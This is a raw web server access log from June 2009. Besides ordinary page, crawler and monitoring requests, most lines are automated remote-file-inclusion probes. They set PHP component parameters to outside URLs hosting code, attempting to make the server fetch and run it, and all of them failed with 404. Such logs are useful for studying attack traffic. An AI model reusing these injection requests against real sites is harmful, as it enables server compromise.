89.223.3.98 - - [16/Jun/2009:00:32:32 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:00:32:32 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:00:32:32 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:00:32:48 -0400] "GET /logs/access_log.Q108032300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
76.224.115.242 - - [16/Jun/2009:00:32:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FunWebProducts-MyWay; .NET CLR 1.1.4322)"
76.224.115.242 - - [16/Jun/2009:00:32:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FunWebProducts-MyWay; .NET CLR 1.1.4322)"
89.223.3.98 - - [16/Jun/2009:00:32:55 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
76.224.115.242 - - [16/Jun/2009:00:32:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FunWebProducts-MyWay; .NET CLR 1.1.4322)"
76.224.115.242 - - [16/Jun/2009:00:32:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FunWebProducts-MyWay; .NET CLR 1.1.4322)"
211.189.40.248 - - [16/Jun/2009:00:33:10 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:33:10 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:33:11 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:33:11 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:33:11 -0400] "GET /logs/error_log.Q109030300%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:33:11 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:00:33:11 -0400] "GET /logs/access_log.Q109060600/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [16/Jun/2009:00:33:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.40.248 - - [16/Jun/2009:00:33:34 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:33:35 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:00:33:58 -0400] "GET /logs/error_log.Q109060600/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
83.98.209.71 - - [16/Jun/2009:00:34:08 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:34:08 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:34:26 -0400] "GET /logs/error_log.Q109060500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:34:27 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.17.151 - - [16/Jun/2009:00:35:17 -0400] "GET /logs/access_log.Q109051500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [16/Jun/2009:00:35:33 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:00:35:43 -0400] "GET /logs/access_log.Q109060100%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:00:37:20 -0400] "GET /images/_notes/nav_store_cart_blue.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.112.121.225 - - [16/Jun/2009:00:37:54 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:37:54 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:38:06 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:38:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.44.103 - - [16/Jun/2009:00:39:35 -0400] "GET /logs/access_log.Q107122700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.189.59.237 - - [16/Jun/2009:00:40:32 -0400] "GET /logs/access_log.Q109052200/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
121.189.59.237 - - [16/Jun/2009:00:40:38 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
121.189.59.237 - - [16/Jun/2009:00:41:09 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
63.147.72.145 - - [16/Jun/2009:00:42:00 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:00:42:00 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:00:42:00 -0400] "GET /logs/error_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.189.59.237 - - [16/Jun/2009:00:42:31 -0400] "GET /logs/access_log.Q109052200/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
121.189.59.237 - - [16/Jun/2009:00:42:32 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
121.189.59.237 - - [16/Jun/2009:00:42:41 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
38.99.44.103 - - [16/Jun/2009:00:42:45 -0400] "GET /logs/access_log.Q108070200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [16/Jun/2009:00:43:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:00:44:03 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:44:03 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:44:04 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
210.112.121.225 - - [16/Jun/2009:00:44:26 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:44:26 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:44:26 -0400] "GET /logs/error_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:44:31 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:44:31 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:44:31 -0400] "GET /logs/error_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:45:03 -0400] "GET /logs/error_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:45:03 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.112.121.225 - - [16/Jun/2009:00:45:03 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:45:12 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:45:13 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:45:13 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:00:45:30 -0400] "GET /logs/access_log.Q107081600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
83.98.209.71 - - [16/Jun/2009:00:45:43 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:45:43 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:45:44 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:45:48 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:45:48 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:45:48 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:45:53 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:45:53 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:45:53 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:46:17 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:46:29 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:46:38 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:00:46:48 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:46:48 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:46:48 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
83.98.209.71 - - [16/Jun/2009:00:47:00 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:47:20 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:47:32 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.151.2.98 - - [16/Jun/2009:00:47:47 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:00:47:47 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:00:47:47 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
84.201.208.50 - - [16/Jun/2009:00:47:57 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:48:11 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:48:11 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:48:11 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:48:18 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:48:21 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:48:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [16/Jun/2009:00:48:39 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.151.2.98 - - [16/Jun/2009:00:48:49 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:00:48:49 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:00:48:50 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
77.240.235.130 - - [16/Jun/2009:00:49:11 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:49:12 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:49:13 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
200.105.207.244 - - [16/Jun/2009:00:49:51 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:00:50:08 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:00:50:08 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:00:50:12 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [16/Jun/2009:00:50:12 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.54 - - [16/Jun/2009:00:50:16 -0400] "GET /images/Index6_surggown.jpg HTTP/1.1" 200 4051 "-" "Googlebot-Image/1.0"
77.240.235.130 - - [16/Jun/2009:00:50:43 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:50:43 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:50:44 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:50:53 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:50:54 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:50:55 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:51:23 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:51:48 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
75.145.152.113 - - [16/Jun/2009:00:51:49 -0400] "GET //bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.145.152.113 - - [16/Jun/2009:00:51:49 -0400] "GET /logs/access_log.Q109051700%20%20//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
75.145.152.113 - - [16/Jun/2009:00:51:53 -0400] "GET /logs//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:51:57 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:51:57 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:51:57 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:52:05 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:52:05 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:52:05 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:52:09 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:00:52:15 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:52:15 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:00:52:16 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
